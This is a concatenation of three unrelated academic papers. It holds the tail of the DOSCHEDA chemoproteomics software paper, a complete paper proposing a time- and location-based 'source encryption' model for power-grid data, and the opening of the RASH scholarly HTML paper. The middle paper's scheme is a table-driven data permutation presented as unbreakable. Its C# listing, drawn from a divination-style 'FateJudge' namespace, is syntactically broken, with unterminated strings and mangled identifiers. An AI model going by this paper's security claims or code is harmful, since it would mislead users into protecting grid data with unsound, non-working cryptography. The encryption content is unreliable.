=0.4 (C,∼77%), and 382 with R2 =0.8 (D, 28%). The user should initially run the exploratory data analysis in DOSCHEDA up to the Principal Component Analysis (PCA) and the correlogram plot to evaluate the correlation between replicates. Only at this point the user can make an informed decision whether to apply the peptide removal function or continue to analyze the data without applying the removal process. Yet, being an open source tool the peptide removal process could be replaced by any other similar function that might be available in literature (see the DOSCHEDA Bioconductor vignette). Additional Features. The server version of DOSCHEDA comprises additional uploads that are useful when researchers are comparing datasets, including: (i) intersections of the enriched proteins with a user uploaded GeneID list (e.g., protein kinesis); (ii) default mapping from Uniprot accession to GeneIDs using InterMine or in case the organism of interest is not present in the drop-down list, DOSCHEDA allows the user to specify the mapping file. Furthermore, DOSCHEDA allows: (i) two normalization/scaling options (see DOSCHEDA manual); (ii) interactive 2D plots with user-defined x- and y- axes; (iii) quality control (QC) traffic lights flags; (iv) downloadable results and detailed report of the analyses. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 6/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.129 Figure 3 DOSCHEDA workflow. RESULTS DOSCHEDA generates a variety of different plots depending on the user’s data input, as outlined in Fig. 3. Overall there are two sets of output plots, one designed for the quality control (QC), the other one to visualize the results of the analyzed data. The DOSCHEDA application provides standard QC plots such as box, whisker plots, data distributions within each iTRAQ/TMT channel, correlogram plots to quantify the correlation between replicates, a 2D-plot to verify the variance independence from the data mean, and a plot of the first two principal components. Based on the QC outcomes, if data are consistent the user can proceed to the inspection of the statistical analysis results, otherwise, if peptide intensities are available the peptide removal process can be applied. For the analysis, depending on the chosen statistical model, DOSCHEDA will generate different outputs. In case of a linear model the p values distributions for the three coefficients (a0, a1 and a2) and their corresponding interactive volcano plots are displayed. In case of a sigmoidal model DOSCHEDA will output three plots: the first showing the sigmoidal curves with a difference higher than 30% between the top and the bottom value; the second and the third showing the proteins that have a significant RB50 (p value <0.05) and a significant slope (p value <0.05), respectively. Independently of the applied statistical model, the R package d3heatmap is used to generate an interactive heatmap of the input data. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 7/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.129 Figure 4 DOSCHEDA traffic lights flags system. Two types of QCs’ are available, type 1 based on pair- wise samples correlation obtained from the correlogram plot (A–C) and, type 2 based on model’s p val- ues coefficients (D–E) obtained by running the linear or sigmoidal statistical analysis. In both types, green flags will be displayed when there is no anti-correlation between any samples and the number of pro- teins with p value(s) <0.05 is larger than zero. On the contrary orange flags will be displayed when anti- correlation is observed (B) in at least one of the pairwise samples (i.e., Pearson Correlation Coefficient, R2 < 0) and/or there are no proteins that passes the threshold of p value(s) < 0.05 (F). Once the analysis has been completed, the summary section of the application allows the user to visualize the results in a table format, where functions like ‘‘search’’ and ‘‘sorting’’ are also enabled for quick queries. The summary section contains quality control (QC) traffic light flags with green for data consistency and orange for data incongruences with an accompanying warning message. There are two types of traffic lights flags; see Fig. 4. Finally, in the download section of the application the user can download (i) a .csv file containing the results of the analysis which also includes the user-input dataset and (ii) an html report with all the plots produced in the current run, the key tables as well as the session information to facilitate data reproducibility. CONCLUSION DOSCHEDA enables researchers with limited programming experience to perform, evaluate, and interactively visualize chemoproteomics data analysis. DOSCHEDA includes linear and non-linear statistical analysis whose results can be exported in excel spreadsheet format. Also, the user will be able to generate a full report of the executed data analysis, facilitating data reproducibility. Being open source, DOSCHEDA can be easily extended and modified to fit specific additional analyses. Availability and requirements DOSCHEDA server lives at https://doscheda.shinyapps.io/doscheda/ and it will be constantly maintained by the authors; the users by following the link above can upload and analyze their own datasets without additional requirements. Finally, to facilitate traceability and reproducibility DOSCHEDA is also available as an open source Bioconductor package. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 8/11 https://peerj.com https://doscheda.shinyapps.io/doscheda/ http://dx.doi.org/10.7717/peerj-cs.129 Abbreviations DOSCHEDA Down Stream Chemoproteomics Data Analysis QC Quality Controls iTRAQ Isobaric tag for relative and absolute quantitation TMT Tandem Mass Tag MS Mass Spectrometry GUI Graphical User Interface ACKNOWLEDGEMENTS We thank Dr. Ian Barrett from the Discovery Sciences Quantitative Biology group for the critical review of the manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by AstraZeneca R&D, Quantitative Biology, Cambridge, United Kingdom. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: AstraZeneca R&D, Quantitative Biology, Cambridge, United Kingdom. Competing Interests Bruno Contrino, Eric Miele, Ronald Tomlinson, M. Paola Castaldi, and Piero Ricchiuto are employees of Discovery Science, AstraZeneca. Author Contributions • Bruno Contrino analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • Eric Miele performed the experiments, contributed reagents/materials/analysis tools. • Ronald Tomlinson contributed reagents/materials/analysis tools, reviewed drafts of the paper. • M. Paola Castaldi contributed reagents/materials/analysis tools, reviewed drafts of the paper. • Piero Ricchiuto conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The code, manual, walkthrough descriptions and dummy data are available here: https://github.com/brunocontrino/DOSCHEDA_APP. Bioconductor repository and package status: https://github.com/Bioconductor/Contributions/issues/406. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 9/11 https://peerj.com https://github.com/brunocontrino/DOSCHEDA_APP https://github.com/Bioconductor/Contributions/issues/406 http://dx.doi.org/10.7717/peerj-cs.129 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.129#supplemental-information. REFERENCES Bantscheff M, Boesche M, Eberhard D, Matthieson T, Sweetman G, Kuster B. 2008. Robust and sensitive iTRAQ quantification on an LTQ Orbitrap mass spectrometer. Mol Cell Proteomics 7(9):1702–1713 DOI 10.1074/mcp.M800029-MCP200. Bantscheff M, Drewes G. 2012. Chemoproteomic approaches to drug target identi- fication and drug profiling. Bioorganic & Medicinal Chemistry 20(6):1973–1978 DOI 10.1016/j.bmc.2011.11.003. Bantscheff M, Eberhard D, Abraham Y, Bastuck S, Boesche M, Hobson S, Mathieson T, Perrin J, Raida M, Rau C, Reader V, Sweetman G, Bauer A, Bouwmeester T, Hopf C, Kruse U, Neubauer G, Ramdsen N, Rick J, Kuster B, Drewes G. 2007. Quantitative chemical proteomics reveals mechanisms of action of clinical ABL kinase inhibitors. Nature Biotech 25:1035–1044 DOI 10.1038/nbt1328. Chang W, Cheng J, Allaire J, Xie Y, McPherson J. 2015. Shiny: web application framework for R. R package version 0.12. Available at http://CRAN.R-project.org/ package=shiny. Choi M, Chang CY, Clough T, Broudy D, Killeen T, MacLean B, Vitek O. 2014. MSstats: an R package for statistical analysis of quantitative mass spectrometry-based proteomic experiments. Bioinformatics 20(17):2524–2526. Cox J, Mann M. 2008. MaxQuant enables high peptide identification rates, individualized p.p.b.-range mass accuracies and proteome-wide protein quantification. Nature Biotechnology 26:1367–1372 DOI 10.1038/nbt.1511. Daub H. 2015. Quantitative proteomics of kinase inhibitor targets and mechanisms. Chamical Biology (ACS) 10:201–212 DOI 10.1021/cb5008794. Fischer M, Renard BY. 2016. iPQF: a new peptide-to-protein summarization method us- ing peptide spectra characteristics to improve protein quantification. Bioinformatics 32(7):1040–1047 DOI 10.1093/bioinformatics/btv675. Jones LH, Neubert H. 2017. Clinical chemoproteomics—opportunities and obstacles. Science Translational Medicine 9(386):eaaf7951 DOI 10.1126/scitranslmed.aaf7951. Kou Q, Xun L, Liu X. 2016. TopPIC: a software tool for top-down mass spectrometry- based proteoform identification and characterization. Bioinformatics 15(32(22)) 3495–3497. MacLean B, Tomazela DM, Shulman N, Chambers M, Finney GL, Frewen B, Kern R, Tabb DL, Liebler DC, MacCoss MJ. 2010. Skyline: an open source document editor for creating and analyzing targeted proteomics experiments. Bioinformatics 26(7):966–968 DOI 10.1093/bioinformatics/btq054. Manning. 2002. The protein kinase complement of the human genome. Science 298:1912–1934 DOI 10.1126/science.1075762. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 10/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.129#supplemental-information http://dx.doi.org/10.7717/peerj-cs.129#supplemental-information http://dx.doi.org/10.1074/mcp.M800029-MCP200 http://dx.doi.org/10.1016/j.bmc.2011.11.003 http://dx.doi.org/10.1038/nbt1328 http://CRAN.R-project.org/package=shiny http://CRAN.R-project.org/package=shiny http://dx.doi.org/10.1038/nbt.1511 http://dx.doi.org/10.1021/cb5008794 http://dx.doi.org/10.1093/bioinformatics/btv675 http://dx.doi.org/10.1126/scitranslmed.aaf7951 http://dx.doi.org/10.1093/bioinformatics/btq054 http://dx.doi.org/10.1126/science.1075762 http://dx.doi.org/10.7717/peerj-cs.129 Martinez MD, Nordlund P. 2016. The cellular thermal shift assay: a novel biophysical assay for in situ drug target engagement and mechanistic biomarker studies. Annual Review of Pharmacology and Toxicology 56:141–161 DOI 10.1146/annurev-pharmtox-010715-103715. Mellacheruvu D, Wright Z, Couzens AL, Lambert JP, St-Denis NA, Li T, Miteva YV, Hauri S, Sardiu ME, Low TY, Halim VA, Bagshaw RD, Hubner NC, Al-Hakim A, Bouchard A, Faubert D, Fermin D, Dunham WH, Goudreault M, Lin ZY, Badillo BG, Pawson T, Durocher D, Coulombe B, Aebersold R, Superti-Furga G, Colinge J, Heck AJ, Choi H, Gstaiger M, Mohammed S, Cristea IM, Bennett KL, Washburn MP, Raught B, Ewing RM, Gingras AC, Nesvizhskii AI. 2013. The CRAPome: a contaminant repository for affinity purification mass spectrometry data. Nature Methods 10:730–736 DOI 10.1038/nmeth.2557. R Core Team. 2014. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at http://www.r-project.org. Ritz C, Baty F, Streibig JC, Gerhard D. 2015. Dose-response analysis using R. PLOS ONE 10(12):e0146021 DOI 10.1371/journal.pone.0146021. Savitski MM, Mathieson T, Zinn N, Sweetman G, Doce C, Becher I, Pachl F, Kuster B, Bantscheff M. 2013. Measuring and managing ratio compression for accurate iTRAQ/TMT quantification. Journal of Proteome Research 12(8):3586–3598 DOI 10.1021/pr400098r. Schirle M, Bantscheff M, Kuster B. 2012. Mass spectrometry-based proteomics in preclinical drug discovery. Chemistry and Biology 27(19):72–84 DOI 10.1016/j.chembiol.2012.01.002. Smyth GK. 2004. Linear models and empirical Bayes methods for assessing differential expression in microarray experiments. Statistical Applications in Genetics and Molecular Biology 3: Article 3. Smyth LA, Collins I. 2009. Measuring and interpreting the selectivity of protein kinase inhibitors. Journal of Chemical Biology 2(3):131–151 DOI 10.1007/s12154-009-0023-9. Tyanova S, Temu T, Sinitcyn P, Carlson A, Hein MY, Geiger T, Mann M, Cox J. 2016. The Perseus computational platform for comprehensive analysis of (prote)omics data. Nature Methods 13:731–740 DOI 10.1038/nmeth.3901. Wang P, Yang P, Yang JY. 2012. OCAP: an open comprehensive analysis pipeline for iTRAQ. Bioinformatics 28(10):1404–1405 DOI 10.1093/bioinformatics/bts150. Wieczorek S, Combes F, Lazar C, Gianetto QG, Gatto L, Dorffer A, Hesse AM, Couté Y, Ferro M, Bruley C, Burger T. 2017. DAPAR & ProStaR: software to perform sta- tistical analyses in quantitative discovery proteomics. Bioinformatics 33(1):135–136 DOI 10.1093/bioinformatics/btw580. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 11/11 https://peerj.com http://dx.doi.org/10.1146/annurev-pharmtox-010715-103715 http://dx.doi.org/10.1038/nmeth.2557 http://www.r-project.org http://dx.doi.org/10.1371/journal.pone.0146021 http://dx.doi.org/10.1021/pr400098r http://dx.doi.org/10.1016/j.chembiol.2012.01.002 http://dx.doi.org/10.1007/s12154-009-0023-9 http://dx.doi.org/10.1038/nmeth.3901 http://dx.doi.org/10.1093/bioinformatics/bts150 http://dx.doi.org/10.1093/bioinformatics/btw580 http://dx.doi.org/10.7717/peerj-cs.129 work_raz6yc35h5exrkxeaaitdt322e ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-073 68 Application of the Source Encryption Algorithm Model in the Power Industry Jiao Longbing Shaanxi Huabiao Network Technology Co., Ltd. Xi’an, 610041, China E-mail: james9894@163.com Abstract—With the development of Internet technology and Internet of Things technology, the Internet of Everything has become a hot topic, and in March 2019, the National Grid for the first time clarified the definition of the Pan-In Power Internet of Things, pointing out that the company's most urgent and important task is to accelerate the construction of the Pan-In Power Internet of Things. The security of Data Transfer on-line at any time is particularly important, in order to ensure the security of data, in the process of data transmission, data needs to be encrypted. This paper expounds a model of the information source data encryption algorithm, analyzes the encryption algorithm and the encryption method, and then provides a reference basis for the data transmission data security of power system. Keywords-Data Communication; Encryption Algorithm Model; Encryption Technology I. INTRODUCTION Driven by intelligence and informatization, ubiquitous electric Internet of things is just at the right time. The construction of power Internet of things puts forward higher requirements for data management and information management. At present, the state grid system is connected to more than 500 million terminal devices, and with the construction of electric Internet of things and the surge, there will be a huge amount of data. Data is an important asset, data privacy protection, the construction of data security grading system, based on different security levels to determine the open rights of data, to ensure the efficiency of business execution and smooth management. Internet of things technology is developing rapidly, but the corresponding infrastructure and security protection capabilities do not adapt to it. Network security is the biggest hidden danger of the power Internet of things. On the one hand, non-ip communication protocol is often used to transmit data in the Internet of things, which lacks effective security measures. On the other hand, the increasingly intelligent and professional means of network attack have brought new problems to network security protection, leading to frequent network security incidents in the field of power grid in recent years. Therefore, strengthening the security risk control and management of intelligent and informationized power Internet of things will be a key point of China's ubiquitous power Internet of things construction. This paper will focus on the introduction of a source encryption algorithm model, hoping to provide a digital security model reference for the application of digital business in the power industry. II. INTRODUCTION TO ENCRYPTION TECHNOLOGY As an important part of network security, data encryption technology plays a very important role in the network. It involves the confidentiality, authentication, non-repudiation and integrity of data. Key is the key of data encryption, which controls the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 69 implementation of encryption and decryption algorithms. According to the different keys, the encryption technology is divided into symmetric encryption technology, asymmetric encryption technology, mixed encryption technology. A. Symmetric encryption Symmetric encryption means that the encryption key can be inferred from the decryption key, and the decryption key can also be inferred from the encryption key. In most symmetric algorithms, the encryption key and the decryption key are the same. For this algorithm, its key (secret key) usually needs messenger or secret channel to transmit, and it is difficult to transmit and manage the key. In this case, the secret preservation of the key determines the security of the algorithm. RC4, chaos algorithm, DES, IDEA, RCZ algorithm are typical representative of symmetric key encryption system. Because both parties have the same key, symmetric encryption technology is easy to implement and fast, so it is widely used in communication and storage data encryption and decryption. The security of symmetric encryption depends on the key, so the secret of the key is very important to the security of communication. The symmetric encryption process is shown in the figure 1. Figure 1. Symmetric encryption flow chart B. Asymmetric encryption This technique can also be called public key cryptography. The encryption key (public key) can be made public, that is, it can be obtained by strangers and used to encrypt the information, but the information can only be decrypted with the corresponding decryption key (private key). Compared with symmetric encryption algorithms, asymmetric encryption algorithms usually require two keys: public key and Private key. When data is encrypted with a key, if it is encrypted with a public key, it can only be decrypted with the corresponding private key. Instead, it is decrypted with the corresponding public key. The advantage of public key cryptography is that it can adapt to the open requirements of the network, but the speed is relatively slow, not suitable for encrypting files. The asymmetric encryption process is shown in the figure 2. Figure 2. Asymmetric encryption flowchart C. Hybrid encryption Hybrid encryption is not a single encryption technology, but a combination of the above two data encryption technology combined product. The communication process of the communication parties is divided into two parts. The parties first use asymmetric encryption technology to transmit the symmetric key used in the communication, and then use symmetric encryption technology to encrypt and transmit the file. III. TEMPORAL AND SPATIAL VARIABLES PARTICIPATE IN THE SOURCE ENCRYPTION MODEL A. Time variable definition： 1) Year, month, day, hour and time variables International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 70 TABLE I. TIME VARIOMETER 1 2 3 4 5 6 7 8 9 10 11 12 A B C D E F G H I J K L 1 a Aa Ba Ca Da Ea Fa Ga Ha Ia Ja ka La 2 b Ab Bb Cb Db Eb Fb Gb Hb Ib Jb kb Lb 3 c Ac Bc Cc Dc Ec Fc Gc Hc Ic Jc kc Lc 4 d Ad Bd Cd Dd Ed Fd Gd Hd Id Jd kd Ld 5 e Ae Be Ce De Ee Fe Ge He Ie Je ke Le 6 f Af Bf Cf Df Ef Ff Gf Hf If Jf kf Lf 7 g Ag Bg Cg Dg Eg Fg Gg Hg Ig Jg kg Lg 8 h Ah Bh Ch Dh Eh Fh Gh Hh Ih Jh kh Lh 9 i Ai Bi Ci Di Ei Fi Gi Hi Ii Ji ki Li 10 j Aj Bj Cj Dj Ej Fj Gj Hj Ij Jj kj Lj Year, month, day and hour variables are added to the partial key format of data information source, as shown in figure format, 12 bits and 10 bits are combined to form a unique time variable. Year, month, day, and hour cycle with 60 and map to Gregorian calendar time. 2) Increase position variable The position variable is assigned to map the location of the source to the latitude and longitude coordinates. As the key bit. TABLE II. LOCATION VARIABLES 4 southeast 9 south 2 southwest 3 east 5 center 7 west 8 northeast 1 north 6 northwest 3) The source data is rearranged and encrypted according to location, time and solar term variables The data format conversion of an encryption depends on a unique time point, and the time point of data encryption determines that the data conversion mode in the figure below is unique. Figure 3. Data conversion mode Determine the starting time of the data encryption variable, time variable form the basis for packet rotation changes, packets after be confirmed time and location, the data layer, and then each layer of blocks, each block in the above order to secondary polarization, and then according to the law of time each block and the PAGE will be rotating, and the rule of each PAGE rotation, eventually forming the smallest unit, each unit to block position number. After the above sequence of data format and order is completely disrupted, according to the unconventional format of the order, is to refer to the passage of time and position rotation. After such data arrangement, data, pictures, videos and other files, even if they are intercepted, cannot obtain the key encryption variables of time, solar term and location, and cannot obtain useful key information even if they are enumerated. 4) Law of rotation arrangement of source data format After the data is divided into different pages, it is rotated and changed according to the hierarchy of layers. For example, the bottom layer is the rotation mode, the third layer is the feig reordering, the second layer is the rotation according to the third layer of feig, the first layer is the rotation according to the second International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 71 layer of rotation. To this data page is partitioned and rearranged. Then the quadratic element is carried out, and the data block of the first part is redistributed into 16 blocks. After three dimensions, three dimensions and four dimensions are differentiated to the smallest data unit bit. Figure 4. Rotation arrangement rule 5) Data decryption process model Figure 5. Data decryption model a) The sender rearranges the blocks and pages of the data format according to the time variable and the position marker bit, and the quadratic element and cubic element are segmented and arranged according to the same method to form the minimum bit of scatter random data. b) Transfer process: the file transfer process is transmitted with three-point random minimum bit data, and the time at this time is a shift. After the time shift, the information received by the receiver should be arranged according to the change of time variable for time key mapping. c) C. Data receiver, the receiver is minimum scatter data, the receiver must key is according to the sender to the time, location, variables and receiving time to time, location, and, according to the minimum level to the smallest unit according to position the label to the reverse calculation into pieces, and then pushing block reverse page to the model, and then push the page to the original data model. The process record of backward calculation is the decryption key. The above data encryption model is the data encryption model established based on the cubic dimension secret calculation model, which can be used to split and switch the top secret data multiple times. In addition, it is not only applicable to data, but also applicable to audio and image data. 6) The programming language realizes the model construction idea of the encryption model  Data type definition using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace FateJudge.Core.QM { public class QM Data { public static int[] ShunZhuan = new int[] { 1, 8, 3, 4, 9, 2, 7, 6 }; public static int[] NiZhuan = new int[] { 1,6,7,2,9,4,3,8}; public static String[] jushu=new string[]{ "174","285","396", "852","963","174", "396","417","528", "417","528","639", International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 72 "936","825","714", "258","147","936", "714","693","582", "693","582","471"}; public static String QYYW=" public static String[] RPQM = new string[] { " }; public static String[] tianpanxingyuanwei = new string[] { }; public static String[] SPQM = new string[] { }; public static String[] renpanxingzhuanxu = new string[] {}; public static String[] tianpanxingzhuanxu = new string[] { }; public static String[] shenpanzhuanxu = new string[] { };/ } }  Data rotation public int getRPG (string yinyan, int zhishigong, string zhishi, string ren) { int ret = 0; int n = getStringArrayIndex(QMData.rpxzx, ren);// - getStringArrayIndex(QMData. rpxzx, zS) + 8) % 8; int n1 = 0; n1 = (getIntArrayIndex(QMData.ShunZhuan, zhishigong) + n) % 8; ret = QMData.ShunZhuan[n1]; return ret; } public int getIntArrayIndex(int[] sa, int n) { int ret = 0; for (int i = 0; i < sa.Length; i++) if (sa[i].Equals(n)) { ret = i; break; } } return ret; } public string getPostRenPan(string zhishi, int zhishigong, int p) { string ret = string.Empty; int n1 = 0; int n2 = 0; int n3 = 0; n1 = (getIntArrayIndex(QMData.ShunZhuan, p) - getIntArrayIndex(QMD.ShunZhuan, zhishigong) + 8) % 8; n2 = getStringArrayIndex(Qi=M=Data. rpxzx, zhishi); n3 = (8 + n2 + n1) % 8; ret = QiMenData. rpxzx [n3]; return ret; } IV. CONCLUSION Figure 6. Data encryption model Power data is the lifeblood of a country's economy and people's life. With the great development of Internet of things, Internet and ubiquitous electric Internet of things, the security of data connection is particularly important. Through the practice of the above data encryption model, the source information can be encrypted, which is different from several symmetric encryption algorithms and asymmetric encryption algorithms. This kind of model calculation can be encapsulated into IC or T card to form an encryption module, which is widely used in power inspection terminals, smart electricity meters and power big data cleaning applications, to increase the security means of data transmission, and to provide some enlightenment and reference for the data transmission encryption methods of power companies. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 73 REFERENCE [1] Song Lei, Luo Qiliang, Luo Yi, Tu Guangyu. Encryption scheme of real-time data communication in power system [J]. Power system automation, 2004 (07) [2] Liu gang, liang ye et al. Realization and application of digital certificate technology in power secondary system [J]. Power grid technology,2006,10 [3] Xingyuan Wang,Hongyu Zhao,Le Feng,Xiaolin Ye,Hao Zhang. High-sensitivity image encryption algorithm with random diffusion based on dynamic-coupled map lattices[J]. Optics and Lasers in Engineering,2019,122. [4] Chen changqing. Research on computer network communication intrusion prevention method based on data encryption technology [J]. Information and computer (theoretical edition),2019(14):171-172. [5] DOE/Oak Ridge National Laboratory; ORNL to take on nine power grid modernization projects as part of DOE award[J]. NewsRx Health & Science,2019. [6] Chen zhiguang. Analysis and design of power project management system of state grid fuzhou power supply company [D]. Yunnan university,2016. work_rd3cilvao5avtowjpe2c6looxq ---- Submitted 9 October 2016 Accepted 7 August 2017 Published 2 October 2017 Corresponding author Silvio Peroni, silvio.peroni@unibo.it Academic editor Ciro Cattuto Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.132 Copyright 2017 Peroni et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Research Articles in Simplified HTML: a Web-first format for HTML-based scholarly articles Silvio Peroni1, Francesco Osborne2, Angelo Di Iorio1, Andrea Giovanni Nuzzolese3, Francesco Poggi1, Fabio Vitali1 and Enrico Motta2 1 Digital and Semantic Publishing Laboratory, Department of Computer Science and Engineering, University of Bologna, Bologna, Italy 2 Knowledge Media Institute, Open University, Milton Keynes, United Kingdom 3 Semantic Technologies Laboratory, Institute of Cognitive Sciences and Technologies, Italian National Research Council, Rome, Italy ABSTRACT Purpose. This paper introduces the Research Articles in Simplified HTML (or RASH), which is a Web-first format for writing HTML-based scholarly papers; it is accompanied by the RASH Framework, a set of tools for interacting with RASH-based articles. The paper also presents an evaluation that involved authors and reviewers of RASH articles submitted to the SAVE-SD 2015 and SAVE-SD 2016 workshops. Design. RASH has been developed aiming to: be easy to learn and use; share scholarly documents (and embedded semantic annotations) through the Web; support its adoption within the existing publishing workflow. Findings. The evaluation study confirmed that RASH is ready to be adopted in workshops, conferences, and journals and can be quickly learnt by researchers who are familiar with HTML. Research Limitations. The evaluation study also highlighted some issues in the adoption of RASH, and in general of HTML formats, especially by less technically savvy users. Moreover, additional tools are needed, e.g., for enabling additional conversions from/to existing formats such as OpenXML. Practical Implications. RASH (and its Framework) is another step towards enabling the definition of formal representations of the meaning of the content of an article, facilitating its automatic discovery, enabling its linking to semantically related articles, providing access to data within the article in actionable form, and allowing integration of data between papers. Social Implications. RASH addresses the intrinsic needs related to the various users of a scholarly article: researchers (focussing on its content), readers (experiencing new ways for browsing it), citizen scientists (reusing available data formally defined within it through semantic annotations), publishers (using the advantages of new technologies as envisioned by the Semantic Publishing movement). Value. RASH helps authors to focus on the organisation of their texts, supports them in the task of semantically enriching the content of articles, and leaves all the issues about validation, visualisation, conversion, and semantic data extraction to the various tools developed within its Framework. How to cite this article Peroni et al. (2017), Research Articles in Simplified HTML: a Web-first format for HTML-based scholarly arti- cles. PeerJ Comput. Sci. 3:e132; DOI 10.7717/peerj-cs.132 https://peerj.com mailto:silvio.peroni@unibo.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.132 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.132 Subjects Digital Libraries, World Wide Web and Web Science Keywords Document conversion, XSLT, RASH, Semantic Publishing, Digital Publishing, Semantic Web INTRODUCTION In the last months of 2014, several posts within technical mailing lists of the Web (https://lists.w3.org/Archives/Public/public-lod/2014Nov/0003.html) and Semantic Web (https://lists.w3.org/Archives/Public/public-lod/2014Oct/0058.html) community have discussedan evergreentopic inscholarly communication, i.e.,how couldauthorsof research papers submit their works in HTML rather than, say, PDF, MS Word or LaTeX. Besides the obvious justification of simplification and unification of data formats for drafting, submission and publication, an additional underlying rationale is that the adoption of HTML would ease the embedding of semantic annotations, thus improving research communications thanks to already existing W3C standards such as RDFa (Sporny, 2015), Turtle (Prud’hommeaux & Carothers, 2014) and JSON-LD (Sporny, Kellogg & Lanthaler, 2014). This opens complex and exciting scenarios that the Semantic Publishing community has promised us in terms of increased discoverability, interactivity, openness and usability of the scientific works (Bourne et al., 2011; Shotton et al., 2009). Nonetheless, HTML is still primarily used as an output format only: the authors write their papers in LaTeX or MS Word and submit sources to the typesetters, who are responsible for producing the final version, that eventually will be published and read on the Web. Appropriate tools in the publishing toolchain are used to convert papers among multiple formats. The interest in Web-first research papers—that are natively designed, stored and transferred in HTML—is increasing. Just to cite a few research efforts: Scholarly HTML (http://scholarlyhtml.org) defines a set of descriptive rules for adopting a defined subset of HTML to describe the metadata and content of scholarly articles; Dokieli (http://dokie.li) is a Web application that allows authors to create HTML-based scholarly articles directly on the browser, adding annotations and many other sophisticated features. This paper introduces a novel approach towards the same goal: providing authors with a subset of HTML for Web-first papers. The format is called RASH, Research Articles in Sim- plified HTML, and consists of 32 HTML elements only. This format is also accompanied by the RASH Framework, a set of specifications and tools for RASH documents (Peroni, 2017). There are two key differences between RASH and other similar proposals. First of all, RASH adopts a simplified pattern-based data model. The number of markup elements to be used by authors was reduced down to the bare minimum, and the elements themselves were chosen in order to minimize the cognitive effort of authors when writing documents. Secondly, RASH does not come with a full authoring environment but is expected to be produced from MS Word, ODT and LaTeX sources. The basic idea is to allow authors to keep using the word processors on which they routinely write their papers and to Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 2/35 https://peerj.com https://lists.w3.org/Archives/Public/public-lod/2014Nov/0003.html https://lists.w3.org/Archives/Public/public-lod/2014Oct/0058.html http://scholarlyhtml.org http://dokie.li http://dx.doi.org/10.7717/peerj-cs.132 provide them with multi-format converters. These converters are included in the RASH Framework, whose architecture is modular and extensible for handling new formats in the future. RASH is in fact intended to help authors in focussing on the organisation of their texts and supports them in the task of semantically enriching the content of articles, delegating all the issues about validation/presentation/conversion of RASH documents to the various tools developed within its Framework. This is a well-known principle in scientific publishing, even if not yet fully applied: clear separation of concerns. The authors should focus on organising the content and structure only, and the format should not require authors to worry about how the content will be presented on screen and in print. The publishers will then take care of creating the final formatting to best render the content in the style of their publications, or authors could use self-publishing platforms as promoted by Linked Research (http://linkedresearch.org). Such a separation of concerns can be pushed much forward. Pettifer et al. (2011) explained well the difference between an article as ‘‘an instance of scholarly thought’’ and ‘‘a representation for consumption by human or machine’’, and showed how multiple representations can be combined, integrated with external data, enhanced and interacted with in order to provide scholars with sophisticated tools directly within their articles. Another critical requirement for any HTML-based language used for scientific writing is good rendering and acceptance by the publishers. Any new HTML-based format should be beneficial for publishers as well. Of course, publishers, conferences, and workshop organisers, would like to manage new formats in the same way as for the formats they already support, such as LaTeX. To this end, these formats should support tools for their conversion and for rendering the content in specific layouts, such as ACM ICPS (http://www.acm.org/sigs/publications/proceedings-templates) and Springer LNCS (http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0). RASH adopts a pragmatic approach to this issue: while we are interested in a full-fledged native RASH authoring environment, we implemented a set of converters, in the RASH Framework, that are easily integrable (and were integrated) with existing publishing platforms. The goal of this paper is, in fact, to describe the outcomes of some experimentations on the use of RASH, so as to understand: 1. if it can be adopted as HTML-based submission format in academic venues (workshops, conferences, journals); 2. if it is easy to learn and use; 3. if it can be used to add semantic annotations and what are the most widely adopted vocabularies in RASH papers. The rest of the paper is structured as follows. In ‘Related Works’ we introduce some of the most relevant related works in the area, providing a functional comparison of the various works. In ‘Which ‘‘Web-first’’ Format for Research Articles?’ we introduce the rationale for the creation of a new Web-first format for scholarly publications, discussing the importance of minimality. In ‘Writing Scholarly Articles in HTML with RASH’ and ‘The RASH Framework’ we introduce the theoretical background of RASH, and then provide an introduction to the language and the main tools included in its Framework. In ‘RASH Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 3/35 https://peerj.com http://linkedresearch.org http://www.acm.org/sigs/publications/proceedings-templates http://www.springer.com/computer/lncs?SGWID=0-164-6-793341-0 http://dx.doi.org/10.7717/peerj-cs.132 and SAVE-SD: an Evaluation’ we present, as a case study, an analysis of the adoption of RASH at the SAVE-SD 2015 (http://cs.unibo.it/save-sd/2015/index.html) and SAVE-SD 2016 (http://cs.unibo.it/save-sd/2016/index.html) workshops. Finally, in ‘Conclusions’ we conclude the paper by sketching out some future developments. RELATED WORKS The growing interest in the publication of Web-first research papers has resulted in the release of some interesting projects related to RASH. In the following 